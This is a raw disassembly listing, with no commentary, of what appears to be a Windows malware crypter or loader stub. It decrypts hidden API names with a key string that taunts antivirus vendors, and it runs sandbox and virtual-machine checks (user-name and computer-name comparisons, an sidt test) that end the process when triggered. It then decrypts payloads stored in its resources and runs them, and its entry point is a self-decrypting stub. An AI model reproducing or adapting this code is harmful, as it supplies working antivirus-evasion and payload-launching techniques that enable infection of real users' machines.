mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404D0C
call sub_403E78
mov eax, [ebp+var_20]
call sub_4037FC
push eax
push ebx
call ds:dword_4076A8 ; GetProcAddress
mov ds:dword_4076B8, eax
lea ecx, [ebp+var_24]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404D24
call sub_403E78
mov eax, [ebp+var_24]
call sub_4037FC
push eax
push ebx
call ds:dword_4076A8 ; GetProcAddress
mov ds:dword_4076BC, eax
lea ecx, [ebp+var_28]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404D3C
call sub_403E78
mov eax, [ebp+var_28]
call sub_4037FC
push eax
push ebx
call ds:dword_4076A8 ; GetProcAddress
mov ds:dword_4076C0, eax
lea ecx, [ebp+var_2C]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404D54
call sub_403E78
mov eax, [ebp+var_2C]
call sub_4037FC
push eax
push ebx
call ds:dword_4076A8 ; GetProcAddress
mov ds:dword_4076C4, eax
lea ecx, [ebp+var_30]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404D6C
call sub_403E78
mov eax, [ebp+var_30]
call sub_4037FC
push eax
push ebx
call ds:dword_4076A8 ; GetProcAddress
mov ds:dword_4076C8, eax
lea ecx, [ebp+var_34]
mov edx, offset aIam1337rofl@_1 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404D84
call sub_403E78
mov eax, [ebp+var_34]
call sub_4037FC
push eax
push ebx
call ds:dword_4076A8 ; GetProcAddress
mov edx, ds:off_4060C0
mov [edx], eax
push ebx
mov eax, ds:off_4060C0
mov eax, [eax]
call eax
push esi
mov eax, ds:off_4060C0
mov eax, [eax]
call eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404C25
loc_404C10: ; CODE XREF: sub_4049DC+247�j
lea eax, [ebp+var_34]
mov edx, 0Dh
call sub_403584
retn
; ---------------------------------------------------------------------------
loc_404C1E: ; DATA XREF: sub_4049DC+15�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_404C10
; ---------------------------------------------------------------------------
loc_404C25: ; CODE XREF: sub_4049DC+241�j
; DATA XREF: sub_4049DC+22F�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4049DC endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 21h
aIam1337rofl@_1 db 'IAM1337ROFL@AVsESPECIALLYSYMANTEC',0 ; DATA XREF: sub_4049DC+23�o
; sub_4049DC+45�o ...
align 4
dd 0FFFFFFFFh, 0Ch
dword_404C60 dd 0F1543970h, 0F68FEAECh, 0C0191612h, 0 dd 0FFFFFFFFh, 0Ch
dword_404C78 dd 0FE50387Ah, 0F68FEFF9h, 0C0191612h, 0 dd 0FFFFFFFFh, 0Eh
dword_404C90 dd 0CF52395Ch, 85DFE9FBh, 0C9071658h, 0CFD5h, 0FFFFFFFFh
; DATA XREF: sub_4049DC+6C�o
dd 0Bh
dword_404CA8 dd 0EB4F245Eh, 0A7D3F4D9h, 60159h, 0FFFFFFFFh, 12h
; DATA XREF: sub_4049DC+92�o
dword_404CBC dd 0D952395Ch, 85D9EAE0h, 0C5070648h, 0D59AC9C4h, 5632h
; DATA XREF: sub_4049DC+B9�o
dd 0FFFFFFFFh, 0Ch
dword_404CD8 dd 0CA52395Ch, 8ACEE3FAh, 0ED101F5Dh, 0 dd 0FFFFFFFFh, 10h
dword_404CF0 dd 0DC52395Ch, 0B1CCEBE6h, 0E2071748h, 0F18BD1C7h, 0
; DATA XREF: sub_4049DC+107�o
dd 0FFFFFFFFh, 0Dh
dword_404D0C dd 0FB48355Dh, 0ABCFE3DBh, 0C9160049h, 0E7h, 0FFFFFFFFh
; DATA XREF: sub_4049DC+12E�o
dd 0Eh
dword_404D24 dd 0FA5C3548h, 0A1EEE0E6h, 0DE001D4Fh, 0D9C5h, 0FFFFFFFFh
; DATA XREF: sub_4049DC+155�o
dd 0Ch
dword_404D3C dd 0FB473357h, 0ABCFE3DBh, 0C9160049h, 0 dd 0FFFFFFFFh, 0Ch
dword_404D54 dd 0F4453357h, 0ABCFE3DBh, 0C9160049h, 0 dd 0FFFFFFFFh, 0Ch
dword_404D6C dd 0FA432E5Dh, 0ABCFE3DBh, 0C9160049h, 0 dd 0FFFFFFFFh, 0Bh
dword_404D84 dd 0FA432E5Dh, 0B6DEEFC5h, 0C005Dh
; =============== S U B R O U T I N E =======================================
sub_404D90 proc near ; CODE XREF: sub_405138+20�p
; sub_405138+30�p ...
var_108 = byte ptr -108h
push ebx
push esi
add esp, 0FFFFFEF4h
mov esi, edx
mov ebx, eax
lea edx, [esp+114h+var_108]
mov eax, ebx
call sub_402BC4
lea edx, [esp+114h+var_108]
mov eax, esp
mov cl, 0Bh
call sub_402B28
mov eax, esi
mov edx, esp
call sub_403664
add esp, 10Ch
pop esi
pop ebx
retn
sub_404D90 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404DC8 proc near ; CODE XREF: sub_405138+28�p
; sub_405138+38�p ...
push ecx
mov edx, esp
call sub_402BD0
pop edx
retn
sub_404DC8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404DD4 proc near ; CODE XREF: sub_404E94+1D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
xor edx, edx
mov [ebp+var_4], edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_404E42
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_8], 0FDh
lea eax, [ebp+var_4]
mov edx, 0FEh
call sub_403854
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+var_4]
call sub_4037FC
push eax
call ds:dword_4076B0 ; GetUserNameA
lea eax, [ebp+var_4]
mov edx, [ebp+var_8]
call sub_403854
mov eax, ebx
mov edx, [ebp+var_4]
call sub_4035B4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404E49
loc_404E39: ; CODE XREF: sub_404DD4+73�j
lea eax, [ebp+var_4]
call sub_403560
retn
; ---------------------------------------------------------------------------
loc_404E42: ; DATA XREF: sub_404DD4+11�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_404E39
; ---------------------------------------------------------------------------
loc_404E49: ; CODE XREF: sub_404DD4+6D�j
; DATA XREF: sub_404DD4+60�o
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_404DD4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404E50 proc near ; CODE XREF: sub_404E94+46�p
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebx
add esp, 0FFFFFEFCh
mov ebx, eax
mov [esp+108h+var_108], 100h
push esp
lea eax, [esp+10Ch+var_104]
push eax
call ds:dword_4076B4
test eax, eax
jz short loc_404E82
mov eax, ebx
lea edx, [esp+108h+var_104]
mov ecx, 100h
call sub_403670
jmp short loc_404E89
; ---------------------------------------------------------------------------
loc_404E82: ; CODE XREF: sub_404E50+1E�j
mov eax, ebx
call sub_403560
loc_404E89: ; CODE XREF: sub_404E50+30�j
add esp, 104h
pop ebx
retn
sub_404E50 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E94 proc near ; CODE XREF: sub_40520C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ebx
xor eax, eax
push ebp
push offset loc_404F1D
push dword ptr fs:[eax]
mov fs:[eax], esp
xor ebx, ebx
lea eax, [ebp+var_4]
call sub_404DD4
mov eax, [ebp+var_4]
push eax
lea ecx, [ebp+var_8]
mov edx, offset aIam1337rofl@_2 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404F60
call sub_403E78
mov edx, [ebp+var_8]
pop eax
call sub_403748
jnz short loc_404F02
lea eax, [ebp+var_C]
call sub_404E50
mov eax, [ebp+var_C]
push eax
lea ecx, [ebp+var_10]
mov edx, offset aIam1337rofl@_2 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_404F74
call sub_403E78
mov edx, [ebp+var_10]
pop eax
call sub_403748
jnz short loc_404F02
mov bl, 1
loc_404F02: ; CODE XREF: sub_404E94+41�j
; sub_404E94+6A�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404F24
loc_404F0F: ; CODE XREF: sub_404E94+8E�j
lea eax, [ebp+var_10]
mov edx, 4
call sub_403584
retn
; ---------------------------------------------------------------------------
loc_404F1D: ; DATA XREF: sub_404E94+D�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_404F0F
; ---------------------------------------------------------------------------
loc_404F24: ; CODE XREF: sub_404E94+88�j
; DATA XREF: sub_404E94+76�o
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_404E94 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 21h
aIam1337rofl@_2 db 'IAM1337ROFL@AVsESPECIALLYSYMANTEC',0 ; DATA XREF: sub_404E94+29�o
; sub_404E94+52�o
align 4
dd 0FFFFFFFFh, 8
dword_404F60 dd 0ED432F4Eh, 0A1D1E7C7h, 0 dd 0FFFFFFFFh, 0Ch
dword_404F74 dd 0CF6B1358h, 96F9D2DCh, 0E9383372h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F84 proc near ; CODE XREF: sub_40520C+1B�p
var_7 = byte ptr -7
var_6 = byte ptr -6
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
lea eax, [ebp+var_7]
sidt fword ptr [ebp+var_6]
cmp dword ptr [ebp+var_6+2], 0F0000000h
jle short loc_404FA5
cmp dword ptr [ebp+var_6+2], 0FF000000h
jg short loc_404FB4
jmp short loc_404FBA
; ---------------------------------------------------------------------------
loc_404FA5: ; CODE XREF: sub_404F84+14�j
cmp dword ptr [ebp+var_6+2], 0D0000000h
jle short loc_404FBA
mov [ebp+var_7], 1
jmp short loc_404FBE
; ---------------------------------------------------------------------------
loc_404FB4: ; CODE XREF: sub_404F84+1D�j
mov [ebp+var_7], 2
jmp short loc_404FBE
; ---------------------------------------------------------------------------
loc_404FBA: ; CODE XREF: sub_404F84+1F�j
; sub_404F84+28�j
mov [ebp+var_7], 0
loc_404FBE: ; CODE XREF: sub_404F84+2E�j
; sub_404F84+34�j
mov al, [eax]
pop ecx
pop ecx
pop ebp
retn
sub_404F84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FC4 proc near ; CODE XREF: sub_40520C+12�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0
push 0
push ebx
xor eax, eax
push ebp
push offset loc_405026
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_4]
xor eax, eax
call sub_402A6C
mov eax, [ebp+var_4]
push eax
lea ecx, [ebp+var_8]
mov edx, offset aIam1337rofl@_3 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_405068
call sub_403E78
mov edx, [ebp+var_8]
pop eax
call sub_403748
jnz short loc_405009
mov bl, 1
jmp short loc_40500B
; ---------------------------------------------------------------------------
loc_405009: ; CODE XREF: sub_404FC4+3F�j
xor ebx, ebx
loc_40500B: ; CODE XREF: sub_404FC4+43�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40502D
loc_405018: ; CODE XREF: sub_404FC4+67�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_403584
retn
; ---------------------------------------------------------------------------
loc_405026: ; DATA XREF: sub_404FC4+B�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_405018
; ---------------------------------------------------------------------------
loc_40502D: ; CODE XREF: sub_404FC4+61�j
; DATA XREF: sub_404FC4+4F�o
mov eax, ebx
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_404FC4 endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 21h
aIam1337rofl@_3 db 'IAM1337ROFL@AVsESPECIALLYSYMANTEC',0 ; DATA XREF: sub_404FC4+27�o
align 10h
dd 0FFFFFFFFh, 0Dh
dword_405068 dd 0EC7A6658h, 0A8CCEBE8h, 0D4105C59h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405078 proc near ; CODE XREF: sub_40520C+9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
xor eax, eax
mov [ebp+var_8], eax
xor eax, eax
push ebp
push offset loc_4050E9
push dword ptr fs:[eax]
mov fs:[eax], esp
xor ebx, ebx
mov eax, 40h
call sub_4027B4
mov esi, eax
mov [ebp+var_4], 40h
lea eax, [ebp+var_4]
push eax
push esi
call ds:dword_4076B0 ; GetUserNameA
lea ecx, [ebp+var_8]
mov edx, offset aIam1337rofl@_4 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, offset dword_40512C
call sub_403E78
mov eax, [ebp+var_8]
call sub_4037FC
cmp esi, eax
jnz short loc_4050D3
mov bl, 1
loc_4050D3: ; CODE XREF: sub_405078+57�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4050F0
loc_4050E0: ; CODE XREF: sub_405078+76�j
lea eax, [ebp+var_8]
call sub_403560
retn
; ---------------------------------------------------------------------------
loc_4050E9: ; DATA XREF: sub_405078+10�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_4050E0
; ---------------------------------------------------------------------------
loc_4050F0: ; CODE XREF: sub_405078+70�j
; DATA XREF: sub_405078+63�o
mov eax, ebx
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_405078 endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 21h
aIam1337rofl@_4 db 'IAM1337ROFL@AVsESPECIALLYSYMANTEC',0 ; DATA XREF: sub_405078+3E�o
align 4
dd 0FFFFFFFFh, 0Bh
dword_40512C dd 0ED542958h, 91C8E8ECh, 7174Fh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405138 proc near ; CODE XREF: CODE:00405341�p
; CODE:00405394�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ebx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4051B2
push dword ptr fs:[eax]
mov fs:[eax], esp
nop
lea edx, [ebp+var_10]
mov eax, ebx
call sub_404D90
mov eax, [ebp+var_10]
call sub_404DC8
lea edx, [ebp+var_C]
call sub_404D90
mov eax, [ebp+var_C]
call sub_404DC8
lea edx, [ebp+var_8]
call sub_404D90
mov eax, [ebp+var_8]
call sub_404DC8
lea edx, [ebp+var_4]
call sub_404D90
mov eax, [ebp+var_4]
call sub_404DC8
mov ebx, eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4051B9
loc_4051A4: ; CODE XREF: sub_405138+7F�j
lea eax, [ebp+var_10]
mov edx, 4
call sub_403584
retn
; ---------------------------------------------------------------------------
loc_4051B2: ; DATA XREF: sub_405138+F�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_4051A4
; ---------------------------------------------------------------------------
loc_4051B9: ; CODE XREF: sub_405138+79�j
; DATA XREF: sub_405138+67�o
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_405138 endp
; =============== S U B R O U T I N E =======================================
sub_4051C0 proc near ; CODE XREF: CODE:004052E7�p
; CODE:00405357�p
push ebx
push esi
mov esi, eax
push 0Ah
push edx
mov eax, ds:dword_407650
push eax
call ds:dword_4076B8 ; FindResourceA
mov ebx, eax
push ebx
mov eax, ds:dword_407650
push eax
call ds:dword_4076BC ; SizeofResource
mov [esi], eax
push ebx
mov eax, ds:dword_407650
push eax
call ds:dword_4076C0 ; LoadResource
mov ebx, eax
push ebx
call ds:dword_4076C4 ; SetHandleCount
mov esi, eax
test esi, esi
jz short loc_405207
push ebx
call ds:dword_4076C8 ; FreeResource
loc_405207: ; CODE XREF: sub_4051C0+3E�j
mov eax, esi
pop esi
pop ebx
retn
sub_4051C0 endp
; =============== S U B R O U T I N E =======================================
sub_40520C proc near ; CODE XREF: CODE:004052D8�p
call sub_404E94
cmp al, 1
jz short loc_405230
call sub_405078
cmp al, 1
jz short loc_405230
call sub_404FC4
cmp al, 1
jz short loc_405230
call sub_404F84
cmp al, 2
jnz short locret_405237
loc_405230: ; CODE XREF: sub_40520C+7�j
; sub_40520C+10�j ...
xor eax, eax
call sub_403548
; ---------------------------------------------------------------------------
locret_405237: ; CODE XREF: sub_40520C+22�j
retn
sub_40520C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405238 proc near ; DATA XREF: CODE:004052A4�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_405257
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40525E
loc_405256: ; CODE XREF: sub_405238+24�j
retn
; ---------------------------------------------------------------------------
loc_405257: ; DATA XREF: sub_405238+6�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_405256
; ---------------------------------------------------------------------------
loc_40525E: ; CODE XREF: sub_405238:loc_405256�j
; DATA XREF: sub_405238+19�o
pop ebp
retn
sub_405238 endp
; ---------------------------------------------------------------------------
dword_405260 dd 8 ; BSS:off_407628�o
dd offset off_405268
off_405268 dd offset loc_403C84 ; DATA XREF: CODE:00405264�o
dd offset sub_403C54
dd offset sub_403A78
dd offset sub_403A24
dd offset sub_403CBC
dd offset sub_403C8C
dd offset sub_403D0C
dd offset sub_403CDC
dd offset sub_403F10
dd offset sub_403EE0
dd offset sub_4041B8
dd offset sub_404188
dd offset sub_4049CC
dd offset sub_40499C
dd 0
dd offset sub_405238
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov ecx, 4
loc_4052B0: ; CODE XREF: CODE:004052B5�j
push 0
push 0
dec ecx
jnz short loc_4052B0
push ecx
push ebx
push esi
push edi
mov eax, offset dword_405260
call sub_403C10
xor eax, eax
push ebp
push offset loc_405444
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_4049DC
call sub_40520C
mov edx, offset dword_405454
mov eax, offset dword_4076D0
call sub_4051C0
mov ebx, eax
test ebx, ebx
jnz short loc_4052FA
push 0
call ds:dword_4076CC ; ExitProcess
loc_4052FA: ; CODE XREF: CODE:004052F0�j
mov edx, offset dword_4076DC
mov eax, ebx
mov ecx, ds:dword_4076D0
call sub_4028C8
mov edi, 1
mov eax, offset dword_4077E0
call sub_403560
mov esi, 0Ah
loc_405320: ; CODE XREF: CODE:0040541B�j
lea edx, [ebp-14h]
mov eax, edi
call sub_404D90
mov ecx, [ebp-14h]
mov eax, offset dword_4077E0
mov edx, offset dword_405460
call sub_4036D4
mov eax, 91h
call sub_405138
mov eax, ds:dword_4077E0
call sub_4037FC
mov edx, eax
mov eax, offset dword_4076D4
call sub_4051C0
mov ebx, eax
test ebx, ebx
jz loc_405411
mov eax, offset dword_4076D8
mov edx, ds:dword_4076D4
call sub_403854
mov eax, offset dword_4076D8
call sub_40384C
mov edx, eax
mov eax, ebx
mov ecx, ds:dword_4076D4
call sub_4028C8
mov eax, 91h
call sub_405138
lea ecx, [ebp-18h]
mov edx, offset aIam1337rofl@_5 ; "IAM1337ROFL@AVsESPECIALLYSYMANTEC"
mov eax, ds:dword_4076D8
call sub_403E78
mov edx, [ebp-18h]
mov eax, offset dword_4076D8
call sub_4035B4
mov eax, ds:dword_4076D8
push eax
lea eax, [ebp-20h]
push eax
call sub_403F24
mov eax, [ebp-20h]
push eax
lea eax, [ebp-1Ch]
push eax
call sub_4040B4
mov edx, [ebp-1Ch]
mov eax, offset dword_4076D8
call sub_4035B4
mov eax, 91h
call sub_405138
push 0
lea edx, [ebp-24h]
xor eax, eax
call sub_402A6C
mov eax, [ebp-24h]
push eax
mov eax, offset dword_4076D8
call sub_40384C
xor ecx, ecx
pop edx
call sub_4046C0
test al, al
jmp short loc_405419
; ---------------------------------------------------------------------------
loc_405411: ; CODE XREF: CODE:00405360�j
push 0
call ds:dword_4076CC ; ExitProcess
loc_405419: ; CODE XREF: CODE:0040540F�j
inc edi
dec esi
jnz loc_405320
push 0
call ds:dword_4076CC ; ExitProcess
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40544B
loc_405436: ; CODE XREF: CODE:00405449�j
lea eax, [ebp-24h]
mov edx, 5
call sub_403584
retn
; ---------------------------------------------------------------------------
loc_405444: ; DATA XREF: CODE:004052C8�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_405436
; ---------------------------------------------------------------------------
loc_40544B: ; CODE XREF: CODE:00405443�j
; DATA XREF: CODE:00405431�o
pop edi
pop esi
pop ebx
call sub_403468
; ---------------------------------------------------------------------------
align 4
dword_405454 dd 544553h, 0FFFFFFFFh, 2dword_405460 dd 4643h, 0FFFFFFFFh, 21haIam1337rofl@_5 db 'IAM1337ROFL@AVsESPECIALLYSYMANTEC',0 ; DATA XREF: CODE:0040539C�o
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_4054AB
call sub_405534
mov ebp, fs:0
sub ebp, 0FFFFFFF8h
jmp loc_4054E7
start endp
; =============== S U B R O U T I N E =======================================
sub_4054AB proc near ; CODE XREF: start+3�p
push dword ptr fs:0
mov fs:0, esp
xor edx, edx
push 80000000h
push edx
push edx
push 80000000h
push edx
push 800h
push 80h
push edx
push 4
push 1000h
push 80000000h
push edx
call ds:dword_4080A4 ; LocalFree
loc_4054E7: ; CODE XREF: start+16�j
sub eax, eax
loc_4054E9: ; CODE XREF: sub_4054AB+44�j
dec al
or al, al
jz short loc_4054F3
jnz short loc_4054E9
jmp short near ptr 40555Ah
; ---------------------------------------------------------------------------
loc_4054F3: ; CODE XREF: sub_4054AB+42�j
sub esi, esi
sub ecx, ecx
mov cl, 93h
loc_4054F9: ; CODE XREF: sub_4054AB+4F�j
inc esi
loop loc_4054F9
call $+5
pop edx
add edx, 320FFh
push edx
xor ebx, ebx
or ebx, 24EDh
loc_405511: ; CODE XREF: sub_4054AB+76�j
mov al, [edx]
sub ax, si
xchg al, [edx]
add edx, 1
inc esi
sub ebx, 1
or ebx, ebx
jnz short loc_405511
pop edx
mov esp, fs:0
pop dword ptr fs:0
leave
jmp edx
sub_4054AB endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_405534 proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_405534 endp ; sp-analysis failed
CODE ends
; Section 2. (virtual address 00006000)
; Virtual size : 000000C4 ( 196.)
; Section size in file : 000000C4 ( 196.)
; Offset to raw data for section: 00006000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 406000h
dword_406000 dd 0 ; sub_4033AC+2�w ...
dword_406004 dd 0 ; sub_403350+37�r ...
byte_406008 db 2 ; DATA XREF: sub_403A78+D�w
db 8Dh, 40h, 0
word_40600C dw 1332h ; DATA XREF: sub_402CDC+6�r
; sub_402CDC:loc_402D54�r ...
dw 0C08Bh
byte_406010 db 0 ; DATA XREF: sub_402DB8�r sub_402DD4�r ...
db 8Dh, 40h, 0
byte_406014 db 0 ; DATA XREF: sub_403230-336�r
; sub_403230:loc_402F35�r
db 8Dh, 40h, 0
byte_406018 db 0 ; DATA XREF: sub_4033DC:loc_40343D�r
db 8Dh, 40h, 0
dword_40601C dd 0 dword_406020 dd 0 off_406024 dd offset sub_402160 ; DATA XREF: sub_4027B4+A�r
; sub_402804+3F�r
off_406028 dd offset sub_40230C ; DATA XREF: sub_4027E4+5�r
; sub_402804+26�r
off_40602C dd offset sub_4026E8 ; DATA XREF: sub_402804+D�r
byte_406030 db 0 ; DATA XREF: sub_402860+36�r
aRsu db '',0
aFxn@ db '@',0
aError db 'Error',0 ; DATA XREF: sub_4033DC+6C�o
dw 0C08Bh
aRuntimeErrorAt db 'Runtime error at 00000000',0 ; DATA XREF: sub_403350+3�o
; sub_4033DC+32�o ...
dw 0C08Bh
byte_406074 db 30h ; DATA XREF: sub_403350+41�r
db 31h, 32h, 33h
dd 37363534h, 42413938h, 46454443h
TlsIndex dd 0 ; DATA XREF: sub_403B80+C�r
; sub_403B80+37�r ...
dword_406088 dd 0 ; sub_403C10+33�o ...
dword_40608C dd 400000h dword_406090 dd 0 dword_406094 dd 0 align 10h
dword_4060A0 dd 1 dd 10h, 2, 20h, 4, 40h, 4, 40h
off_4060C0 dd offset dword_40769C ; DATA XREF: sub_4049DC+20B�r
; sub_4049DC+214�r ...
DATA ends
; Section 3. (virtual address 00007000)
; Virtual size : 000007E5 ( 2021.)
; Section size in file : 000007E5 ( 2021.)
; Offset to raw data for section: 00007000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
BSS segment para public '' use32
assume cs:BSS
;org 407000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
off_407000 dd offset sub_4038B8 ; DATA XREF: sub_403A78+2F�w
dword_407004 dd 0 dword_407008 dd 0 ; sub_402860+16�r
dword_40700C dd 0 ; CODE:004031A0�r
off_407010 dd offset sub_401008 ; DATA XREF: sub_402DB8+14�r
; sub_402DD4+16�r ...
off_407014 dd offset sub_401010 ; DATA XREF: sub_403230-2B6�r
; CODE:00403188�r ...
dword_407018 dd 0 ; sub_403468+B7�r
dword_40701C dd 400000h dword_407020 dd 6C8h byte_407024 db 0 ; DATA XREF: sub_403310+33�w
align 4
dword_407028 dd 0Ah dword_40702C dd 142340h dword_407030 dd 0 byte_407034 db 0 ; DATA XREF: sub_4033DC+1�r
byte_407035 db 0 ; DATA XREF: sub_401904+1C�r
; sub_401904:loc_4019B8�r ...
byte_407036 db 2 ; DATA XREF: sub_403A78+28�w
align 4
dword_407038 dd 0 ; sub_403A24+19�o
word_40703C dw 0D7B0h ; DATA XREF: sub_403A78+4C�w
align 10h
dd 71h dup(0)
dword_407204 dd 0 ; sub_403A24+23�o
word_407208 dw 0D7B0h ; DATA XREF: sub_4033DC+A�r
; sub_403A78+55�w
align 10h
dword_407210 dd 0 align 10h
dword_407220 dd 0 dd 6Bh dup(0)
dword_4073D0 dd 0 word_4073D4 dw 0D7B0h ; DATA XREF: sub_403A78+5E�w
align 4
dd 71h dup(0)
dword_40759C dd 1 ; sub_402018+C3�w ...
dword_4075A0 dd 40h ; sub_402018+CC�w ...
dword_4075A4 dd 0 ; sub_403A78�w
dword_4075A8 dd 3 ; sub_403A78+B2�w ...
byte_4075AC db 0 ; DATA XREF: sub_401904+A0�w
; sub_401904:loc_4019D3�r ...
align 10h
dword_4075B0 dd 0 ; sub_4015C8+99�w ...
dword_4075B4 dd 6 dup(0) ; sub_401904+25�o ...
dword_4075CC dd 0 ; sub_4010FC+3C�w ...
dword_4075D0 dd 147A5Ch ; sub_4011E4+22�r ...
off_4075D4 dd offset off_4075D4 ; DATA XREF: sub_401364+3E�o
; sub_4013C8+51�o ...
dd offset off_4075D4
dd 2 dup(0)
off_4075E4 dd offset off_4075E4 ; DATA XREF: sub_401684+D�o
; sub_40172C+12�o ...
dd offset off_4075E4
dd 2 dup(0)
aDzdz: ; DATA XREF: sub_401904+80�o
; sub_402018:loc_40202F�r
unicode 0, <DD>,0
align 10h
dword_407600 dd 870044h ; sub_401ADC+4�r ...
dword_407604 dd 0 dword_407608 dd 0 ; sub_401EA8+2E�r ...
dword_40760C dd 0 ; sub_401904+5E�r ...
off_407610 dd offset off_407610 ; DATA XREF: sub_401904+43�o
; sub_4019DC+90�o ...
dd offset off_407610
align 10h
dword_407620 dd 0 ; sub_4032A0+9�o ...
dword_407624 dd 12FFB4h ; sub_403208+2�r
off_407628 dd offset dword_405260 ; DATA XREF: sub_403310+14�w
dword_40762C dd 0 off_407630 dd offset dword_406088 ; DATA XREF: sub_403310+20�w
dd 6 dup(0)
byte_40764C db 0 ; DATA XREF: sub_403BC4�r
align 10h
dword_407650 dd 400000h ; sub_403C10+16�r ...
dword_407654 dd 0 ; CODE:loc_403C84�w
dword_407658 dd 0 dword_40765C dd 0 ; sub_403CBC�w
dword_407660 dd 0 ; sub_403D0C�w
dword_407664 dd 0 ; sub_403F10�w
dword_407668 dd 0 ; sub_4041B8�w
dword_40766C dd 0 ; sub_403F24+DB�r
dword_407670 dd 0 ; sub_403F24+A8�r ...
dword_407674 dd 0 ; sub_4046C0+291�r
dword_407678 dd 0 ; sub_4041C0+22E�w ...
dword_40767C dd 0 ; sub_4046C0+15A�r
dword_407680 dd 0 ; sub_4046C0+FD�r
dword_407684 dd 0 ; sub_4046C0+D7�r
